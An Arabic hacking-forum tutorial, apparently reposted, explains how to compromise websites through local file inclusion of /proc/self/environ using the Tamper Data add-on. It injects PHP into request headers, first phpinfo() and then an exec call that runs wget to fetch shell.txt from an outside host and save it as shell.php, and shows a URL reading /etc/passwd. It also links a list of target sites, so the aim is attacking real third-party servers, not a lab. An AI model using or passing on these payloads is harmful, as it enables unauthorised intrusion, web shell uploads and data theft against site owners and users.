السلام عليكم ورحمة الله وبركاتة

كيفكم اخواني اتمنا الجميع بخير وصحة وعافية

حبيت اطرح هاذا الشرح لجل الافادة واتمنا انه يفديكم

المتطلبات
1. FireFox [download]
2. Tamper Data [download]
والموقع المراد التطبيق علية

انا جبت لكم كم موقع

http://pastie.org/private/7fbtucb1obczki7nk0xvxa


طيب نكمل

في البداية لازم نقدر نقرى proc/self/environ
http://im28.gulfup.com/2012-05-16/1337163837101.png
اضغط هنا لترى الصورة بحجمها الطبيعى

بعد مايضبط الشغل نروح نشغل اداة تمبلر داتا
http://im28.gulfup.com/2012-05-16/1337163837352.png
بعد ماتشتغل معنا الاداة
نروح لم

http://im28.gulfup.com/2012-05-16/133716383713.png

بعدها نروح لم الموقع حقنا ونعمل تحديث وراح تخرج لن هل النافذة

http://im28.gulfup.com/2012-05-16/133716383894.png

بعدها نروح للمربع هاذا


http://im28.gulfup.com/2012-05-16/1337163838475.png

http://im28.gulfup.com/2012-05-16/1337163838266.png
في هاذا المربع وضعنا
<?php phpinfo();?>


عشان نقرة phpinfo ونضمن الشغل

بعد ماتضغط اوك راح تخرج لك كم نافضة اضغط على الكل

http://adf.ly/673135/http://www.gulf...Xrrnldi00d74cc

بعدها ماتضغط وتتخطى

يفتح الموقع ويتم قراة phpinfo

http://im28.gulfup.com/2012-05-16/1337163838198.png

ومنها راح نشوف ادوال والسيف مود وغيرها امر مهم قبل رفع الشل

http://im28.gulfup.com/2012-05-16/1337163838519.png

<?exec('wget http://www.site.com/shell.txt -O shell.php');?>

هاذي هي الدالة exec الي راح نسخدمها لسحب الملف طبعن تقدر تغيرها اذا كانت ممنوعه
الى chmod
system

ومع شوي تطوير راح تضبط

بعدها

نروح نشوف

راح يفتح الموقع مثل ماكان

طيب لما تنتهي من الحقن مثال هل الموقع
http://www.site.com/index.php?page=/etc/passwd
نمسح
index.php?page=/etc/passwd

ونحط
http://www.site.com/shell.php
http://im28.gulfup.com/2012-05-16/13371638388810.jpg

وباذن الله راح يتم الرفع الشل

منقول للفائده،